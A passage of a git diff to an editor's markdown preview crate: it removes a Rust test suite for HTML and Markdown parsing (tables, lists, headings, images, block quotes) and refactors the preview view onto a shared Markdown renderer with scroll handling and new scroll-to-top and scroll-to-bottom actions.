", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![block_quote( - vec![ParsedMarkdownElement::Paragraph(text( - "some description", - 0..78 - ))], - 0..78, - )] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_block_quote() { - let parsed = parse( - "
-

some description

-
-

second description

-
-
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![block_quote( - vec![ - ParsedMarkdownElement::Paragraph(text("some description", 0..179)), - block_quote( - vec![ParsedMarkdownElement::Paragraph(text( - "second description", - 0..179 - ))], - 0..179, - ) - ], - 0..179, - )] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table() { - let parsed = parse( - " - - - - - - - - - - - - - - - - -
IdName
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..366, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Id", 0..366), - ParsedMarkdownTableAlignment::Center - ), - column( - 1, - 1, - true, - text("Name ", 0..366), - ParsedMarkdownTableAlignment::Center - ) - ])], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..366), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..366), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..366), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..366), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_with_caption() { - let parsed = parse( - " - - - - - - - - - - - -
My Table
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..280, - Some(vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..280, - contents: "My Table".into(), - highlights: Default::default(), - regions: Default::default() - })]), - vec![], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..280), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..280), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..280), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..280), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_without_headings() { - let parsed = parse( - " - - - - - - - - - - -
1Chris
2Dennis
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..240, - None, - vec![], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("1", 0..240), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Chris", 0..240), - ParsedMarkdownTableAlignment::None - ) - ]), - row(vec![ - column( - 1, - 1, - false, - text("2", 0..240), - ParsedMarkdownTableAlignment::None - ), - column( - 1, - 1, - false, - text("Dennis", 0..240), - ParsedMarkdownTableAlignment::None - ) - ]), - ], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_table_without_body() { - let parsed = parse( - " - - - - - - -
IdName
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Table(table( - 0..150, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Id", 0..150), - ParsedMarkdownTableAlignment::Center - ), - column( - 1, - 1, - true, - text("Name", 0..150), - ParsedMarkdownTableAlignment::Center - ) - ])], - vec![], - ))], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_heading_tags() { - let parsed = parse("

Heading

Heading

Heading

Heading

Heading
Heading
").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H1, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H2, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H3, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H4, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H5, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - level: HeadingLevel::H6, - source_range: 0..96, - contents: vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..96, - contents: "Heading".into(), - highlights: Vec::default(), - regions: Vec::default() - })], - }), - ], - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag() { - let parsed = parse("").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..40, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag_with_alt_text() { - let parsed = parse("\"Foo\"").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..50, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("Foo".into()), - height: None, - width: None, - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_tag_with_height_and_width() { - let parsed = - parse("").await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..65, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.)))), - width: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(200.)))), - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_image_style_tag_with_height_and_width() { - let parsed = parse( - "", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Image(Image { - source_range: 0..75, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.)))), - width: Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(200.)))), - })] - }, - parsed - ); - } - - #[gpui::test] - async fn test_header_only_table() { - let markdown = "\ -| Header 1 | Header 2 | -|----------|----------| - -Some other content -"; - - let expected_table = table( - 0..48, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Header 1", 1..11), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - true, - text("Header 2", 12..22), - ParsedMarkdownTableAlignment::None, - ), - ])], - vec![], - ); - - assert_eq!( - parse(markdown).await.children[0], - ParsedMarkdownElement::Table(expected_table) - ); - } - - #[gpui::test] - async fn test_basic_table() { - let markdown = "\ -| Header 1 | Header 2 | -|----------|----------| -| Cell 1 | Cell 2 | -| Cell 3 | Cell 4 |"; - - let expected_table = table( - 0..95, - None, - vec![row(vec![ - column( - 1, - 1, - true, - text("Header 1", 1..11), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - true, - text("Header 2", 12..22), - ParsedMarkdownTableAlignment::None, - ), - ])], - vec![ - row(vec![ - column( - 1, - 1, - false, - text("Cell 1", 49..59), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - false, - text("Cell 2", 60..70), - ParsedMarkdownTableAlignment::None, - ), - ]), - row(vec![ - column( - 1, - 1, - false, - text("Cell 3", 73..83), - ParsedMarkdownTableAlignment::None, - ), - column( - 1, - 1, - false, - text("Cell 4", 84..94), - ParsedMarkdownTableAlignment::None, - ), - ]), - ], - ); - - assert_eq!( - parse(markdown).await.children[0], - ParsedMarkdownElement::Table(expected_table) - ); - } - - #[gpui::test] - async fn test_list_basic() { - let parsed = parse( - "\ -* Item 1 -* Item 2 -* Item 3 -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("Item 1", 2..8)]), - list_item(9..17, 1, Unordered, vec![p("Item 2", 11..17)]), - list_item(18..26, 1, Unordered, vec![p("Item 3", 20..26)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_tasks() { - let parsed = parse( - "\ -- [ ] TODO -- [x] Checked -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..10, 1, Task(false, 2..5), vec![p("TODO", 6..10)]), - list_item(11..24, 1, Task(true, 13..16), vec![p("Checked", 17..24)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_indented_task() { - let parsed = parse( - "\ -- [ ] TODO - - [x] Checked - - Unordered - 1. Number 1 - 1. Number 2 -1. Number A -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..12, 1, Task(false, 2..5), vec![p("TODO", 6..10)]), - list_item(13..26, 2, Task(true, 15..18), vec![p("Checked", 19..26)]), - list_item(29..40, 2, Unordered, vec![p("Unordered", 31..40)]), - list_item(43..54, 2, Ordered(1), vec![p("Number 1", 46..54)]), - list_item(57..68, 2, Ordered(2), vec![p("Number 2", 60..68)]), - list_item(69..80, 1, Ordered(1), vec![p("Number A", 72..80)]), - ], - ); - } - - #[gpui::test] - async fn test_list_with_linebreak_is_handled_correctly() { - let parsed = parse( - "\ -- [ ] Task 1 - -- [x] Task 2 -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..13, 1, Task(false, 2..5), vec![p("Task 1", 6..12)]), - list_item(14..26, 1, Task(true, 16..19), vec![p("Task 2", 20..26)]), - ], - ); - } - - #[gpui::test] - async fn test_list_nested() { - let parsed = parse( - "\ -* Item 1 -* Item 2 -* Item 3 - -1. Hello -1. Two - 1. Three -2. Four -3. Five - -* First - 1. Hello - 1. Goodbyte - - Inner - - Inner - 2. Goodbyte - - Next item empty - - -* Last -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("Item 1", 2..8)]), - list_item(9..17, 1, Unordered, vec![p("Item 2", 11..17)]), - list_item(18..27, 1, Unordered, vec![p("Item 3", 20..26)]), - list_item(28..36, 1, Ordered(1), vec![p("Hello", 31..36)]), - list_item(37..46, 1, Ordered(2), vec![p("Two", 40..43),]), - list_item(47..55, 2, Ordered(1), vec![p("Three", 50..55)]), - list_item(56..63, 1, Ordered(3), vec![p("Four", 59..63)]), - list_item(64..72, 1, Ordered(4), vec![p("Five", 67..71)]), - list_item(73..82, 1, Unordered, vec![p("First", 75..80)]), - list_item(83..96, 2, Ordered(1), vec![p("Hello", 86..91)]), - list_item(97..116, 3, Ordered(1), vec![p("Goodbyte", 100..108)]), - list_item(117..124, 4, Unordered, vec![p("Inner", 119..124)]), - list_item(133..140, 4, Unordered, vec![p("Inner", 135..140)]), - list_item(143..159, 2, Ordered(2), vec![p("Goodbyte", 146..154)]), - list_item(160..180, 3, Unordered, vec![p("Next item empty", 165..180)]), - list_item(186..190, 3, Unordered, vec![]), - list_item(191..197, 1, Unordered, vec![p("Last", 193..197)]), - ] - ); - } - - #[gpui::test] - async fn test_list_with_nested_content() { - let parsed = parse( - "\ -* This is a list item with two paragraphs. - - This is the second paragraph in the list item. -", - ) - .await; - - assert_eq!( - parsed.children, - vec![list_item( - 0..96, - 1, - Unordered, - vec![ - p("This is a list item with two paragraphs.", 4..44), - p("This is the second paragraph in the list item.", 50..97) - ], - ),], - ); - } - - #[gpui::test] - async fn test_list_item_with_inline_html() { - let parsed = parse( - "\ -* This is a list item with an inline HTML tag. -", - ) - .await; - - assert_eq!( - parsed.children, - vec![list_item( - 0..67, - 1, - Unordered, - vec![p("This is a list item with an inline HTML tag.", 4..44),], - ),], - ); - } - - #[gpui::test] - async fn test_nested_list_with_paragraph_inside() { - let parsed = parse( - "\ -1. a - 1. b - 1. c - - text - - 1. d -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..7, 1, Ordered(1), vec![p("a", 3..4)],), - list_item(8..20, 2, Ordered(1), vec![p("b", 12..13),],), - list_item(21..27, 3, Ordered(1), vec![p("c", 25..26),],), - p("text", 32..37), - list_item(41..46, 2, Ordered(1), vec![p("d", 45..46),],), - ], - ); - } - - #[gpui::test] - async fn test_list_with_leading_text() { - let parsed = parse( - "\ -* `code` -* **bold** -* [link](https://example.com) -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - list_item(0..8, 1, Unordered, vec![p("code", 2..8)]), - list_item(9..19, 1, Unordered, vec![p("bold", 11..19)]), - list_item(20..49, 1, Unordered, vec![p("link", 22..49)],), - ], - ); - } - - #[gpui::test] - async fn test_simple_block_quote() { - let parsed = parse("> Simple block quote with **styled text**").await; - - assert_eq!( - parsed.children, - vec![block_quote( - vec![p("Simple block quote with styled text", 2..41)], - 0..41 - )] - ); - } - - #[gpui::test] - async fn test_simple_block_quote_with_multiple_lines() { - let parsed = parse( - "\ -> # Heading -> More -> text -> -> More text -", - ) - .await; - - assert_eq!( - parsed.children, - vec![block_quote( - vec![ - h1(text("Heading", 4..11), 2..12), - p("More text", 14..26), - p("More text", 30..40) - ], - 0..40 - )] - ); - } - - #[gpui::test] - async fn test_nested_block_quote() { - let parsed = parse( - "\ -> A -> -> > # B -> -> C - -More text -", - ) - .await; - - assert_eq!( - parsed.children, - vec![ - block_quote( - vec![ - p("A", 2..4), - block_quote(vec![h1(text("B", 12..13), 10..14)], 8..14), - p("C", 18..20) - ], - 0..20 - ), - p("More text", 21..31) - ] - ); - } - - #[gpui::test] - async fn test_code_block() { - let parsed = parse( - "\ -``` -fn main() { - return 0; -} -``` -", - ) - .await; - - assert_eq!( - parsed.children, - vec![code_block( - None, - "fn main() {\n return 0;\n}", - 0..35, - None - )] - ); - } - - #[gpui::test] - async fn test_code_block_with_language(executor: BackgroundExecutor) { - let language_registry = Arc::new(LanguageRegistry::test(executor.clone())); - language_registry.add(language::rust_lang()); - - let parsed = parse_markdown( - "\ -```rust -fn main() { - return 0; -} -``` -", - None, - Some(language_registry), - ) - .await; - - assert_eq!( - parsed.children, - vec![code_block( - Some("rust".to_string()), - "fn main() {\n return 0;\n}", - 0..39, - Some(vec![]) - )] - ); - } - - fn h1(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H1, - contents, - }) - } - - fn h2(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H2, - contents, - }) - } - - fn h3(contents: MarkdownParagraph, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: HeadingLevel::H3, - contents, - }) - } - - fn p(contents: &str, source_range: Range) -> ParsedMarkdownElement { - ParsedMarkdownElement::Paragraph(text(contents, source_range)) - } - - fn text(contents: &str, source_range: Range) -> MarkdownParagraph { - vec![MarkdownParagraphChunk::Text(ParsedMarkdownText { - highlights: Vec::new(), - regions: Vec::new(), - source_range, - contents: contents.to_string().into(), - })] - } - - fn block_quote( - children: Vec, - source_range: Range, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::BlockQuote(ParsedMarkdownBlockQuote { - source_range, - children, - }) - } - - fn code_block( - language: Option, - code: &str, - source_range: Range, - highlights: Option, HighlightId)>>, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::CodeBlock(ParsedMarkdownCodeBlock { - source_range, - language, - contents: code.to_string().into(), - highlights, - }) - } - - fn list_item( - source_range: Range, - depth: u16, - item_type: ParsedMarkdownListItemType, - content: Vec, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - item_type, - depth, - content, - nested: false, - }) - } - - fn nested_list_item( - source_range: Range, - depth: u16, - item_type: ParsedMarkdownListItemType, - content: Vec, - ) -> ParsedMarkdownElement { - ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - item_type, - depth, - content, - nested: true, - }) - } - - fn table( - source_range: Range, - caption: Option, - header: Vec, - body: Vec, - ) -> ParsedMarkdownTable { - ParsedMarkdownTable { - source_range, - header, - body, - caption, - } - } - - fn row(columns: Vec) -> ParsedMarkdownTableRow { - ParsedMarkdownTableRow { columns } - } - - fn column( - col_span: usize, - row_span: usize, - is_header: bool, - children: MarkdownParagraph, - alignment: ParsedMarkdownTableAlignment, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header, - children, - alignment, - } - } - - impl PartialEq for ParsedMarkdownTable { - fn eq(&self, other: &Self) -> bool { - self.source_range == other.source_range - && self.header == other.header - && self.body == other.body - } - } - - impl PartialEq for ParsedMarkdownText { - fn eq(&self, other: &Self) -> bool { - self.source_range == other.source_range && self.contents == other.contents - } - } -} diff --git a/crates/markdown_preview/src/markdown_preview.rs b/crates/markdown_preview/src/markdown_preview.rs index c7e8e9e9272e196da25be086640316129fb819bd..982eff7c74513cb29b368d49ecd454162f2c3913 100644 --- a/crates/markdown_preview/src/markdown_preview.rs +++ b/crates/markdown_preview/src/markdown_preview.rs @@ -1,11 +1,7 @@ use gpui::{App, actions}; use workspace::Workspace; -pub mod markdown_elements; -mod markdown_minifier; -pub mod markdown_parser; pub mod markdown_preview_view; -pub mod markdown_renderer; pub use zed_actions::preview::markdown::{OpenPreview, OpenPreviewToTheSide}; @@ -26,6 +22,10 @@ actions!( ScrollUpByItem, /// Scrolls down by one markdown element in the markdown preview ScrollDownByItem, + /// Scrolls to the top of the markdown preview. + ScrollToTop, + /// Scrolls to the bottom of the markdown preview. + ScrollToBottom, /// Opens a following markdown preview that syncs with the editor. OpenFollowingPreview ] diff --git a/crates/markdown_preview/src/markdown_preview_view.rs b/crates/markdown_preview/src/markdown_preview_view.rs index 79bd7f33290e0510df8dff908b09541717b41696..3e6423b36603e247ba5da2a2166a8357701fa5cd 100644 --- a/crates/markdown_preview/src/markdown_preview_view.rs +++ b/crates/markdown_preview/src/markdown_preview_view.rs @@ -1,46 +1,51 @@ use std::cmp::min; +use std::ops::Range; +use std::path::{Path, PathBuf}; use std::sync::Arc; use std::time::Duration; -use std::{ops::Range, path::PathBuf}; use anyhow::Result; use editor::scroll::Autoscroll; use editor::{Editor, EditorEvent, MultiBufferOffset, SelectionEffects}; use gpui::{ - App, ClickEvent, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, - IntoElement, IsZero, ListState, ParentElement, Render, RetainAllImageCache, Styled, - Subscription, Task, WeakEntity, Window, list, + App, Context, Entity, EventEmitter, FocusHandle, Focusable, ImageSource, InteractiveElement, + IntoElement, IsZero, Pixels, Render, Resource, RetainAllImageCache, ScrollHandle, SharedString, + SharedUri, Subscription, Task, WeakEntity, Window, point, }; use language::LanguageRegistry; +use markdown::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownFont, + MarkdownOptions, MarkdownStyle, +}; +use project::search::SearchQuery; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{WithScrollbar, prelude::*}; -use workspace::item::{Item, ItemHandle}; -use workspace::{Pane, Workspace}; +use util::normalize_path; +use workspace::item::{Item, ItemBufferKind, ItemHandle}; +use workspace::searchable::{ + Direction, SearchEvent, SearchOptions, SearchToken, SearchableItem, SearchableItemHandle, +}; +use workspace::{OpenOptions, OpenVisible, Pane, Workspace}; -use crate::markdown_elements::ParsedMarkdownElement; -use crate::markdown_renderer::{CheckboxClickedEvent, MermaidState}; use crate::{ - OpenFollowingPreview, OpenPreview, OpenPreviewToTheSide, ScrollPageDown, ScrollPageUp, - markdown_elements::ParsedMarkdown, - markdown_parser::parse_markdown, - markdown_renderer::{RenderContext, render_markdown_block}, + OpenFollowingPreview, OpenPreview, OpenPreviewToTheSide, ScrollDown, ScrollDownByItem, }; -use crate::{ScrollDown, ScrollDownByItem, ScrollUp, ScrollUpByItem}; +use crate::{ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ScrollUp, ScrollUpByItem}; const REPARSE_DEBOUNCE: Duration = Duration::from_millis(200); pub struct MarkdownPreviewView { workspace: WeakEntity, - image_cache: Entity, active_editor: Option, focus_handle: FocusHandle, - contents: Option, - selected_block: usize, - list_state: ListState, - language_registry: Arc, - mermaid_state: MermaidState, - parsing_markdown_task: Option>>, + markdown: Entity, + _markdown_subscription: Subscription, + active_source_index: Option, + scroll_handle: ScrollHandle, + image_cache: Entity, + base_directory: Option, + pending_update_task: Option>>, mode: MarkdownPreviewMode, } @@ -205,19 +210,35 @@ impl MarkdownPreviewView { cx: &mut Context, ) -> Entity { cx.new(|cx| { - let list_state = ListState::new(0, gpui::ListAlignment::Top, px(1000.)); - + let markdown = cx.new(|cx| { + Markdown::new_with_options( + SharedString::default(), + Some(language_registry), + None, + MarkdownOptions { + parse_html: true, + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ) + }); let mut this = Self { - selected_block: 0, active_editor: None, focus_handle: cx.focus_handle(), workspace: workspace.clone(), - contents: None, - list_state, - language_registry, - mermaid_state: Default::default(), - parsing_markdown_task: None, + _markdown_subscription: cx.observe( + &markdown, + |this: &mut Self, _: Entity, cx| { + this.sync_active_root_block(cx); + }, + ), + markdown, + active_source_index: None, + scroll_handle: ScrollHandle::new(), image_cache: RetainAllImageCache::new(cx), + base_directory: None, + pending_update_task: None, mode, }; @@ -277,19 +298,19 @@ impl MarkdownPreviewView { |this, editor, event: &EditorEvent, window, cx| { match event { EditorEvent::Edited { .. } + | EditorEvent::BufferEdited { .. } | EditorEvent::DirtyChanged - | EditorEvent::ExcerptsEdited { .. } => { - this.parse_markdown_from_active_editor(true, window, cx); + | EditorEvent::BuffersEdited { .. } => { + this.update_markdown_from_active_editor(true, false, window, cx); } EditorEvent::SelectionsChanged { .. } => { - let selection_range = editor.update(cx, |editor, cx| { - editor - .selections - .last::(&editor.display_snapshot(cx)) - .range() - }); - this.selected_block = this.get_block_index_under_cursor(selection_range); - this.list_state.scroll_to_reveal_item(this.selected_block); + let (selection_start, editor_is_focused) = + editor.update(cx, |editor, cx| { + let index = Self::selected_source_index(editor, cx); + let focused = editor.focus_handle(cx).is_focused(window); + (index, focused) + }); + this.sync_preview_to_source_index(selection_start, editor_is_focused, cx); cx.notify(); } _ => {} @@ -297,23 +318,30 @@ impl MarkdownPreviewView { }, ); + self.base_directory = Self::get_folder_for_active_editor(editor.read(cx), cx); self.active_editor = Some(EditorState { editor, _subscription: subscription, }); - self.parse_markdown_from_active_editor(false, window, cx); + self.update_markdown_from_active_editor(false, true, window, cx); } - fn parse_markdown_from_active_editor( + fn update_markdown_from_active_editor( &mut self, wait_for_debounce: bool, + should_reveal: bool, window: &mut Window, cx: &mut Context, ) { if let Some(state) = &self.active_editor { - self.parsing_markdown_task = Some(self.parse_markdown_in_background( + // if there is already a task to update the ui and the current task is also debounced (not high priority), do nothing + if wait_for_debounce && self.pending_update_task.is_some() { + return; + } + self.pending_update_task = Some(self.schedule_markdown_update( wait_for_debounce, + should_reveal, state.editor.clone(), window, cx, @@ -321,62 +349,98 @@ impl MarkdownPreviewView { } } - fn parse_markdown_in_background( + fn schedule_markdown_update( &mut self, wait_for_debounce: bool, + should_reveal_selection: bool, editor: Entity, window: &mut Window, cx: &mut Context, ) -> Task> { - let language_registry = self.language_registry.clone(); - cx.spawn_in(window, async move |view, cx| { if wait_for_debounce { // Wait for the user to stop typing cx.background_executor().timer(REPARSE_DEBOUNCE).await; } - let (contents, file_location) = view.update(cx, |_, cx| { - let editor = editor.read(cx); - let contents = editor.buffer().read(cx).snapshot(cx).text(); - let file_location = MarkdownPreviewView::get_folder_for_active_editor(editor, cx); - (contents, file_location) - })?; + let editor_clone = editor.clone(); + let update = view.update(cx, |view, cx| { + let is_active_editor = view + .active_editor + .as_ref() + .is_some_and(|active_editor| active_editor.editor == editor_clone); + if !is_active_editor { + return None; + } - let parsing_task = cx.background_spawn(async move { - parse_markdown(&contents, file_location, Some(language_registry)).await - }); - let contents = parsing_task.await; + let (contents, selection_start) = editor_clone.update(cx, |editor, cx| { + let contents = editor.buffer().read(cx).snapshot(cx).text(); + let selection_start = Self::selected_source_index(editor, cx); + (contents, selection_start) + }); + Some((SharedString::from(contents), selection_start)) + })?; view.update(cx, move |view, cx| { - view.mermaid_state.update(&contents, cx); - let markdown_blocks_count = contents.children.len(); - view.contents = Some(contents); - let scroll_top = view.list_state.logical_scroll_top(); - view.list_state.reset(markdown_blocks_count); - view.list_state.scroll_to(scroll_top); + if let Some((contents, selection_start)) = update { + view.markdown.update(cx, |markdown, cx| { + markdown.reset(contents, cx); + }); + view.sync_preview_to_source_index(selection_start, should_reveal_selection, cx); + cx.emit(SearchEvent::MatchesInvalidated); + } + view.pending_update_task = None; cx.notify(); }) }) } - fn move_cursor_to_block( - &self, - window: &mut Window, + fn selected_source_index(editor: &Editor, cx: &mut App) -> usize { + editor + .selections + .last::(&editor.display_snapshot(cx)) + .range() + .start + .0 + } + + fn sync_preview_to_source_index( + &mut self, + source_index: usize, + reveal: bool, cx: &mut Context, - selection: Range, ) { - if let Some(state) = &self.active_editor { - state.editor.update(cx, |editor, cx| { - editor.change_selections( - SelectionEffects::scroll(Autoscroll::center()), - window, - cx, - |selections| selections.select_ranges(vec![selection]), - ); - window.focus(&editor.focus_handle(cx), cx); - }); - } + self.active_source_index = Some(source_index); + self.sync_active_root_block(cx); + self.markdown.update(cx, |markdown, cx| { + if reveal { + markdown.request_autoscroll_to_source_index(source_index, cx); + } + }); + } + + fn sync_active_root_block(&mut self, cx: &mut Context) { + self.markdown.update(cx, |markdown, cx| { + markdown.set_active_root_for_source_index(self.active_source_index, cx); + }); + } + + fn move_cursor_to_source_index( + editor: &Entity, + source_index: usize, + window: &mut Window, + cx: &mut App, + ) { + editor.update(cx, |editor, cx| { + let selection = MultiBufferOffset(source_index)..MultiBufferOffset(source_index); + editor.change_selections( + SelectionEffects::scroll(Autoscroll::center()), + window, + cx, + |selections| selections.select_ranges(vec![selection]), + ); + window.focus(&editor.focus_handle(cx), cx); + }); } /// The absolute path of the file that is currently being previewed. @@ -392,52 +456,24 @@ impl MarkdownPreviewView { } } - fn get_block_index_under_cursor(&self, selection_range: Range) -> usize { - let mut block_index = None; - let cursor = selection_range.start.0; - - let mut last_end = 0; - if let Some(content) = &self.contents { - for (i, block) in content.children.iter().enumerate() { - let Some(Range { start, end }) = block.source_range() else { - continue; - }; - - // Check if the cursor is between the last block and the current block - if last_end <= cursor && cursor < start { - block_index = Some(i.saturating_sub(1)); - break; - } - - if start <= cursor && end >= cursor { - block_index = Some(i); - break; - } - last_end = end; - } - - if block_index.is_none() && last_end < cursor { - block_index = Some(content.children.len().saturating_sub(1)); - } - } - - block_index.unwrap_or_default() + fn line_scroll_amount(&self, cx: &App) -> Pixels { + let settings = ThemeSettings::get_global(cx); + settings.buffer_font_size(cx) * settings.buffer_line_height.value() } - fn should_apply_padding_between( - current_block: &ParsedMarkdownElement, - next_block: Option<&ParsedMarkdownElement>, - ) -> bool { - !(current_block.is_list_item() && next_block.map(|b| b.is_list_item()).unwrap_or(false)) + fn scroll_by_amount(&self, distance: Pixels) { + let offset = self.scroll_handle.offset(); + self.scroll_handle + .set_offset(point(offset.x, offset.y - distance)); } fn scroll_page_up(&mut self, _: &ScrollPageUp, _window: &mut Window, cx: &mut Context) { - let viewport_height = self.list_state.viewport_bounds().size.height; + let viewport_height = self.scroll_handle.bounds().size.height; if viewport_height.is_zero() { return; } - self.list_state.scroll_by(-viewport_height); + self.scroll_by_amount(-viewport_height); cx.notify(); } @@ -447,35 +483,49 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let viewport_height = self.list_state.viewport_bounds().size.height; + let viewport_height = self.scroll_handle.bounds().size.height; if viewport_height.is_zero() { return; } - self.list_state.scroll_by(viewport_height); + self.scroll_by_amount(viewport_height); cx.notify(); } fn scroll_up(&mut self, _: &ScrollUp, window: &mut Window, cx: &mut Context) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { let item_height = bounds.size.height; // Scroll no more than the rough equivalent of a large headline let max_height = window.rem_size() * 2; let scroll_height = min(item_height, max_height); - self.list_state.scroll_by(-scroll_height); + self.scroll_by_amount(-scroll_height); + } else { + let scroll_height = self.line_scroll_amount(cx); + if !scroll_height.is_zero() { + self.scroll_by_amount(-scroll_height); + } } cx.notify(); } fn scroll_down(&mut self, _: &ScrollDown, window: &mut Window, cx: &mut Context) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { let item_height = bounds.size.height; // Scroll no more than the rough equivalent of a large headline let max_height = window.rem_size() * 2; let scroll_height = min(item_height, max_height); - 